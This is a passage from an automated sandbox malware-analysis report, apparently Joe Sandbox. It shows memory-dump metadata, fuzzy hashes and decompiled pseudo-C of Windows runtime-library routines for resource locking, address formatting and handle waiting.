                                                    0x02230c57
                                                    0x02230c5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x02230c60
                                                    0x02230afb
                                                    0x02230afe
                                                    0x02230b02
                                                    0x02230b05
                                                    0x02230b08
                                                    0x00000000
                                                    0x02230b08
                                                    0x02230ae6
                                                    0x02230b44
                                                    0x022309f8
                                                    0x022309f8
                                                    0x022309f9
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eaa0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: cf7d1ed0b661b976d3c315df47bae200dc360e3ed839d554defde9ce4a3205c4
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: ABA18DB1D2031ADECF26CFE4C8446BEB7B5AF05309F24886AD842A7249D7749B45CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E02230554(signed int _a4, char _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int* _t49;
                                                    				signed int _t51;
                                                    				signed int _t56;
                                                    				signed int _t58;
                                                    				signed int _t61;
                                                    				signed int _t63;
                                                    				void* _t66;
                                                    				intOrPtr _t67;
                                                    				void* _t69;
                                                    				signed int _t70;
                                                    				void* _t75;
                                                    				signed int _t81;
                                                    				signed int _t84;
                                                    				void* _t86;
                                                    				signed int _t93;
                                                    				signed int _t96;
                                                    				intOrPtr _t105;
                                                    				signed int _t107;
                                                    				void* _t110;
                                                    				signed int _t115;
                                                    				signed int* _t119;
                                                    				void* _t125;
                                                    				void* _t126;
                                                    				signed int _t128;
                                                    				signed int _t130;
                                                    				signed int _t138;
                                                    				signed int _t144;
                                                    				void* _t158;
                                                    				void* _t159;
                                                    				void* _t160;
                                                    
                                                    				_t96 = _a4;
                                                    				_t115 =  *(_t96 + 0x28);
                                                    				_push(_t138);
                                                    				if(_t115 < 0) {
                                                    					_t105 =  *[fs:0x18];
                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                    						goto L6;
                                                    					} else {
                                                    						__eflags = _t115 | 0xffffffff;
                                                    						asm("lock xadd [eax], edx");
                                                    						return 1;
                                                    					}
                                                    				} else {
                                                    					L6:
                                                    					_push(_t128);
                                                    					while(1) {
                                                    						L7:
                                                    						__eflags = _t115;
                                                    						if(_t115 >= 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                    							_t49 = _t96 + 0x1c;
                                                    							_t106 = 1;
                                                    							asm("lock xadd [edx], ecx");
                                                    							_t115 =  *(_t96 + 0x28);
                                                    							__eflags = _t115;
                                                    							if(_t115 < 0) {
                                                    								L23:
                                                    								_t130 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                    									asm("sbb esi, esi");
                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022d01c0;
                                                    									_push(_t144);
                                                    									_push(0);
                                                    									_t51 = E021EF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                    									__eflags = _t51 - 0x102;
                                                    									if(_t51 != 0x102) {
                                                    										break;
                                                    									}
                                                    									_t106 =  *(_t144 + 4);
                                                    									_t126 =  *_t144;
                                                    									_t86 = E02234FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                    									_push(_t126);
                                                    									_push(_t86);
                                                    									E02243F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                    									E02243F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                    									_t130 = _t130 + 1;
                                                    									_t160 = _t158 + 0x28;
                                                    									__eflags = _t130 - 2;
                                                    									if(__eflags > 0) {
                                                    										E0227217A(_t106, __eflags, _t96);
                                                    									}
                                                    									_push("RTL: Re-Waiting\n");
                                                    									_push(0);
                                                    									_push(0x65);
                                                    									E02243F92();
                                                    									_t158 = _t160 + 0xc;
                                                    								}
                                                    								__eflags = _t51;
                                                    								if(__eflags < 0) {
                                                    									_push(_t51);
                                                    									E02233915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                    									asm("int3");
                                                    									while(1) {
                                                    										L32:
                                                    										__eflags = _a8;
                                                    										if(_a8 == 0) {
                                                    											break;
                                                    										}
                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                    										_t119 = _t96 + 0x24;
                                                    										_t107 = 1;
                                                    										asm("lock xadd [eax], ecx");
                                                    										_t56 =  *(_t96 + 0x28);
                                                    										_a4 = _t56;
                                                    										__eflags = _t56;
                                                    										if(_t56 != 0) {
                                                    											L40:
                                                    											_t128 = 0;
                                                    											__eflags = 0;
                                                    											while(1) {
                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                    												asm("sbb esi, esi");
                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022d01c0;
                                                    												_push(_t138);
                                                    												_push(0);
                                                    												_t58 = E021EF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                    												__eflags = _t58 - 0x102;
                                                    												if(_t58 != 0x102) {
                                                    													break;
                                                    												}
                                                    												_t107 =  *(_t138 + 4);
                                                    												_t125 =  *_t138;
                                                    												_t75 = E02234FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                    												_push(_t125);
                                                    												_push(_t75);
                                                    												E02243F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                    												E02243F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                    												_t128 = _t128 + 1;
                                                    												_t159 = _t158 + 0x28;
                                                    												__eflags = _t128 - 2;
                                                    												if(__eflags > 0) {
                                                    													E0227217A(_t107, __eflags, _t96);
                                                    												}
                                                    												_push("RTL: Re-Waiting\n");
                                                    												_push(0);
                                                    												_push(0x65);
                                                    												E02243F92();
                                                    												_t158 = _t159 + 0xc;
                                                    											}
                                                    											__eflags = _t58;
                                                    											if(__eflags < 0) {
                                                    												_push(_t58);
                                                    												E02233915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                    												asm("int3");
                                                    												_t61 =  *_t107;
                                                    												 *_t107 = 0;
                                                    												__eflags = _t61;
                                                    												if(_t61 == 0) {
                                                    													L1:
                                                    													_t63 = E02215384(_t138 + 0x24);
                                                    													if(_t63 != 0) {
                                                    														goto L52;
                                                    													} else {
                                                    														goto L2;
                                                    													}
                                                    												} else {
                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                    													_push( &_a4);
                                                    													_push(_t61);
                                                    													_t70 = E021EF970( *((intOrPtr*)(_t138 + 0x18)));
                                                    													__eflags = _t70;
                                                    													if(__eflags >= 0) {
                                                    														goto L1;
                                                    													} else {
                                                    														_push(_t70);
                                                    														E02233915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                    														L52:
                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                    														_push( &_a4);
                                                    														_push(1);
                                                    														_t63 = E021EF970( *((intOrPtr*)(_t138 + 0x20)));
                                                    														__eflags = _t63;
                                                    														if(__eflags >= 0) {
                                                    															L2:
                                                    															return _t63;
                                                    														} else {
                                                    															_push(_t63);
                                                    															E02233915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                    															_push( &_a4);
                                                    															_push(1);
                                                    															_t63 = E021EF970( *((intOrPtr*)(_t138 + 0x20)));
                                                    															__eflags = _t63;
                                                    															if(__eflags >= 0) {
                                                    																goto L2;
                                                    															} else {
                                                    																_push(_t63);
                                                    																_t66 = E02233915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                    																asm("int3");
                                                    																while(1) {
                                                    																	_t110 = _t66;
                                                    																	__eflags = _t66 - 1;
                                                    																	if(_t66 != 1) {
                                                    																		break;
                                                    																	}
                                                    																	_t128 = _t128 | 0xffffffff;
                                                    																	_t66 = _t110;
                                                    																	asm("lock cmpxchg [ebx], edi");
                                                    																	__eflags = _t66 - _t110;
                                                    																	if(_t66 != _t110) {
                                                    																		continue;
                                                    																	} else {
                                                    																		_t67 =  *[fs:0x18];
                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                    																		return _t67;
                                                    																	}
                                                    																	goto L59;
                                                    																}
                                                    																E02215329(_t110, _t138);
                                                    																_t69 = E022153A5(_t138, 1);
                                                    																return _t69;
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_t56 =  *(_t96 + 0x28);
                                                    												goto L3;
                                                    											}
                                                    										} else {
                                                    											_t107 =  *_t119;
                                                    											__eflags = _t107;
                                                    											if(__eflags > 0) {
                                                    												while(1) {
                                                    													_t81 = _t107;
                                                    													asm("lock cmpxchg [edi], esi");
                                                    													__eflags = _t81 - _t107;
                                                    													if(_t81 == _t107) {
                                                    														break;
                                                    													}
                                                    													_t107 = _t81;
                                                    													__eflags = _t81;
                                                    													if(_t81 > 0) {
                                                    														continue;
                                                    													}
                                                    													break;
                                                    												}
                                                    												_t56 = _a4;
                                                    												__eflags = _t107;
                                                    											}
                                                    											if(__eflags != 0) {
                                                    												while(1) {
                                                    													L3:
                                                    													__eflags = _t56;
                                                    													if(_t56 != 0) {
                                                    														goto L32;
                                                    													}
                                                    													_t107 = _t107 | 0xffffffff;
                                                    													_t56 = 0;
                                                    													asm("lock cmpxchg [edx], ecx");
                                                    													__eflags = 0;
                                                    													if(0 != 0) {
                                                    														continue;
                                                    													} else {
                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    														return 1;
                                                    													}
                                                    													goto L59;
                                                    												}
                                                    												continue;
                                                    											} else {
                                                    												goto L40;
                                                    											}
                                                    										}
                                                    										goto L59;
                                                    									}
                                                    									__eflags = 0;
                                                    									return 0;
                                                    								} else {
                                                    									_t115 =  *(_t96 + 0x28);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								_t106 =  *_t49;
                                                    								__eflags = _t106;
                                                    								if(__eflags > 0) {
                                                    									while(1) {
                                                    										_t93 = _t106;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										__eflags = _t93 - _t106;
                                                    										if(_t93 == _t106) {
                                                    											break;
                                                    										}
                                                    										_t106 = _t93;
                                                    										__eflags = _t93;
                                                    										if(_t93 > 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									__eflags = _t106;
                                                    								}
                                                    								if(__eflags != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L23;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L59;
                                                    					}
                                                    					_t84 = _t115;
                                                    					asm("lock cmpxchg [esi], ecx");
                                                    					__eflags = _t84 - _t115;
                                                    					if(_t84 != _t115) {
                                                    						_t115 = _t84;
                                                    						goto L7;
                                                    					} else {
                                                    						return 1;
                                                    					}
                                                    				}
                                                    				L59:
                                                    			}


                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02252206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: a4b8055a5f49a83a834f02612671c20d558ec42956e42e97470b5599df696350
                                                    • Instruction ID: 684ca74920d6636729b2998c22bf27831e94f6fefeb0cb76a6931d68f4fdc06a
                                                    • Opcode Fuzzy Hash: a4b8055a5f49a83a834f02612671c20d558ec42956e42e97470b5599df696350
                                                    • Instruction Fuzzy Hash: E4514875720312ABEB15CE98CC80F6673AAAF84710F21C359ED15DB2C9DB71EC418BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E022314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                    				signed int _v8;
                                                    				char _v10;
                                                    				char _v140;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t24;
                                                    				void* _t26;
                                                    				signed int _t29;
                                                    				signed int _t34;
                                                    				signed int _t40;
                                                    				intOrPtr _t45;
                                                    				void* _t51;
                                                    				intOrPtr* _t52;
                                                    				void* _t54;
                                                    				signed int _t57;
                                                    				void* _t58;
                                                    
                                                    				_t51 = __edx;
                                                    				_t24 =  *0x22d2088; // 0x7634c1a7
                                                    				_v8 = _t24 ^ _t57;
                                                    				_t45 = _a16;
                                                    				_t53 = _a4;
                                                    				_t52 = _a20;
                                                    				if(_a4 == 0 || _t52 == 0) {
                                                    					L10:
                                                    					_t26 = 0xc000000d;
                                                    				} else {
                                                    					if(_t45 == 0) {
                                                    						if( *_t52 == _t45) {
                                                    							goto L3;
                                                    						} else {
                                                    							goto L10;
                                                    						}
                                                    					} else {
                                                    						L3:
                                                    						_t28 =  &_v140;
                                                    						if(_a12 != 0) {
                                                    							_push("[");
                                                    							_push(0x41);
                                                    							_push( &_v140);
                                                    							_t29 = E02227707();
                                                    							_t58 = _t58 + 0xc;
                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                    						}
                                                    						_t54 = E022313CB(_t53, _t28);
                                                    						if(_a8 != 0) {
                                                    							_t34 = E02227707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                    							_t58 = _t58 + 0x10;
                                                    							_t54 = _t54 + _t34 * 2;
                                                    						}
                                                    						if(_a12 != 0) {
                                                    							_t40 = E02227707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                    							_t58 = _t58 + 0x10;
                                                    							_t54 = _t54 + _t40 * 2;
                                                    						}
                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                    						 *_t52 = _t53;
                                                    						if( *_t52 < _t53) {
                                                    							goto L10;
                                                    						} else {
                                                    							E021F2340(_t45,  &_v140, _t53 + _t53);
                                                    							_t26 = 0;
                                                    						}
                                                    					}
                                                    				}
                                                    				return E021FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                    			}


                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 0225EA22
                                                      • Part of subcall function 022313CB: ___swprintf_l.LIBCMT ref: 0223146B
                                                      • Part of subcall function 022313CB: ___swprintf_l.LIBCMT ref: 02231490
                                                    • ___swprintf_l.LIBCMT ref: 0223156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: b105134119850998a97d2d5627a923ff8ed8dd989bd9491bc04216e1ae915fa6
                                                    • Instruction ID: c6f414cabe058c392ed69d4e1360cb0a53587c5975f7ac05511178049f988fa2
                                                    • Opcode Fuzzy Hash: b105134119850998a97d2d5627a923ff8ed8dd989bd9491bc04216e1ae915fa6
                                                    • Instruction Fuzzy Hash: C721C5B392022AABDB21DFA4CC40AEE73ACAF54704F444111ED4AD3148DB71AA688BD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 45%
                                                    			E022153A5(signed int _a4, char _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t32;
                                                    				signed int _t37;
                                                    				signed int _t40;
                                                    				signed int _t42;
                                                    				void* _t45;
                                                    				intOrPtr _t46;
                                                    				void* _t48;
                                                    				signed int _t49;
                                                    				void* _t51;
                                                    				signed int _t57;
                                                    				signed int _t64;
                                                    				signed int _t71;
                                                    				void* _t74;
                                                    				intOrPtr _t78;
                                                    				signed int* _t79;
                                                    				void* _t85;
                                                    				signed int _t86;
                                                    				signed int _t92;
                                                    				void* _t104;
                                                    				void* _t105;
                                                    
                                                    				_t64 = _a4;
                                                    				_t32 =  *(_t64 + 0x28);
                                                    				_t71 = _t64 + 0x28;
                                                    				_push(_t92);
                                                    				if(_t32 < 0) {
                                                    					_t78 =  *[fs:0x18];
                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                    						goto L3;
                                                    					} else {
                                                    						__eflags = _t32 | 0xffffffff;
                                                    						asm("lock xadd [ecx], eax");
                                                    						return 1;
                                                    					}
                                                    				} else {
                                                    					L3:
                                                    					_push(_t86);
                                                    					while(1) {
                                                    						L4:
                                                    						__eflags = _t32;
                                                    						if(_t32 == 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                    							_t79 = _t64 + 0x24;
                                                    							_t71 = 1;
                                                    							asm("lock xadd [eax], ecx");
                                                    							_t32 =  *(_t64 + 0x28);
                                                    							_a4 = _t32;
                                                    							__eflags = _t32;
                                                    							if(_t32 != 0) {
                                                    								L19:
                                                    								_t86 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                    									asm("sbb esi, esi");
                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022d01c0;
                                                    									_push(_t92);
                                                    									_push(0);
                                                    									_t37 = E021EF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                    									__eflags = _t37 - 0x102;
                                                    									if(_t37 != 0x102) {
                                                    										break;
                                                    									}
                                                    									_t71 =  *(_t92 + 4);
                                                    									_t85 =  *_t92;
                                                    									_t51 = E02234FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                    									_push(_t85);
                                                    									_push(_t51);
                                                    									E02243F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                    									E02243F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                    									_t86 = _t86 + 1;
                                                    									_t105 = _t104 + 0x28;
                                                    									__eflags = _t86 - 2;
                                                    									if(__eflags > 0) {
                                                    										E0227217A(_t71, __eflags, _t64);
                                                    									}
                                                    									_push("RTL: Re-Waiting\n");
                                                    									_push(0);
                                                    									_push(0x65);
                                                    									E02243F92();
                                                    									_t104 = _t105 + 0xc;
                                                    								}
                                                    								__eflags = _t37;
                                                    								if(__eflags < 0) {
                                                    									_push(_t37);
                                                    									E02233915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                    									asm("int3");
                                                    									_t40 =  *_t71;
                                                    									 *_t71 = 0;
                                                    									__eflags = _t40;
                                                    									if(_t40 == 0) {
                                                    										L1:
                                                    										_t42 = E02215384(_t92 + 0x24);
                                                    										if(_t42 != 0) {
                                                    											goto L31;
                                                    										} else {
                                                    											goto L2;
                                                    										}
                                                    									} else {
                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                    										_push( &_a4);
                                                    										_push(_t40);
                                                    										_t49 = E021EF970( *((intOrPtr*)(_t92 + 0x18)));
                                                    										__eflags = _t49;
                                                    										if(__eflags >= 0) {
                                                    											goto L1;
                                                    										} else {
                                                    											_push(_t49);
                                                    											E02233915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                    											L31:
                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                    											_push( &_a4);
                                                    											_push(1);
                                                    											_t42 = E021EF970( *((intOrPtr*)(_t92 + 0x20)));
                                                    											__eflags = _t42;
                                                    											if(__eflags >= 0) {
                                                    												L2:
                                                    												return _t42;
                                                    											} else {
                                                    												_push(_t42);
                                                    												E02233915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                    												_push( &_a4);
                                                    												_push(1);
                                                    												_t42 = E021EF970( *((intOrPtr*)(_t92 + 0x20)));
                                                    												__eflags = _t42;
                                                    												if(__eflags >= 0) {
                                                    													goto L2;
                                                    												} else {
                                                    													_push(_t42);
                                                    													_t45 = E02233915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                    													asm("int3");
                                                    													while(1) {
                                                    														_t74 = _t45;
                                                    														__eflags = _t45 - 1;
                                                    														if(_t45 != 1) {
                                                    															break;
                                                    														}
                                                    														_t86 = _t86 | 0xffffffff;
                                                    														_t45 = _t74;
                                                    														asm("lock cmpxchg [ebx], edi");
                                                    														__eflags = _t45 - _t74;
                                                    														if(_t45 != _t74) {
                                                    															continue;
                                                    														} else {
                                                    															_t46 =  *[fs:0x18];
                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                    															return _t46;
                                                    														}
                                                    														goto L38;
                                                    													}
                                                    													E02215329(_t74, _t92);
                                                    													_push(1);
                                                    													_t48 = E022153A5(_t92);
                                                    													return _t48;
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								} else {
                                                    									_t32 =  *(_t64 + 0x28);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								_t71 =  *_t79;
                                                    								__eflags = _t71;
                                                    								if(__eflags > 0) {
                                                    									while(1) {
                                                    										_t57 = _t71;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										__eflags = _t57 - _t71;
                                                    										if(_t57 == _t71) {
                                                    											break;
                                                    										}
                                                    										_t71 = _t57;
                                                    										__eflags = _t57;
                                                    										if(_t57 > 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									_t32 = _a4;
                                                    									__eflags = _t71;
                                                    								}
                                                    								if(__eflags != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L19;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L38;
                                                    					}
                                                    					_t71 = _t71 | 0xffffffff;
                                                    					_t32 = 0;
                                                    					asm("lock cmpxchg [edx], ecx");
                                                    					__eflags = 0;
                                                    					if(0 != 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    						return 1;
                                                    					}
                                                    				}
                                                    				L38:
                                                    			}

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022522F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 02252328
                                                    • RTL: Resource at %p, xrefs: 0225230B
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022522FC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: cfd1b7a0fed4398dcadeda7916de8b93a89fe505ac47536409a2bd9f6e7d3748
                                                    • Instruction ID: b03ccd444af500d1dc16353586da1a3140404eaa645e22717d5236834d0ba783
                                                    • Opcode Fuzzy Hash: cfd1b7a0fed4398dcadeda7916de8b93a89fe505ac47536409a2bd9f6e7d3748
                                                    • Instruction Fuzzy Hash: 63510971620712ABDB25DFB4CC80FA673D9AF94324F104259FD55DF288EB71E9428BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E0221EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v24;
                                                    				intOrPtr* _v28;
                                                    				intOrPtr _v32;
                                                    				signed int _v36;
                                                    				intOrPtr _v40;
                                                    				short _v66;
                                                    				char _v72;
                                                    				void* __esi;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t39;
                                                    				signed int _t40;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t43;
                                                    				signed int _t44;
                                                    				void* _t46;
                                                    				intOrPtr _t48;
                                                    				signed int _t49;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t53;
                                                    				signed char _t67;
                                                    				void* _t72;
                                                    				intOrPtr _t77;
                                                    				intOrPtr* _t80;
                                                    				intOrPtr _t84;
                                                    				intOrPtr* _t85;
                                                    				void* _t91;
                                                    				void* _t92;
                                                    				void* _t93;
                                                    
                                                    				_t80 = __edi;
                                                    				_t75 = __edx;
                                                    				_t70 = __ecx;
                                                    				_t84 = _a4;
                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                    					E0220DA92(__ecx, __edx, __eflags, _t84);
                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                    				}
                                                    				_push(0);
                                                    				__eflags = _t38 - 0xffffffff;
                                                    				if(_t38 == 0xffffffff) {
                                                    					_t39 =  *0x22d793c; // 0x0
                                                    					_push(0);
                                                    					_push(_t84);
                                                    					_t40 = E021F16C0(_t39);
                                                    				} else {
                                                    					_t40 = E021EF9D4(_t38);
                                                    				}
                                                    				_pop(_t85);
                                                    				__eflags = _t40;
                                                    				if(__eflags < 0) {
                                                    					_push(_t40);
                                                    					E02233915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                    					asm("int3");
                                                    					while(1) {
                                                    						L21:
                                                    						_t76 =  *[fs:0x18];
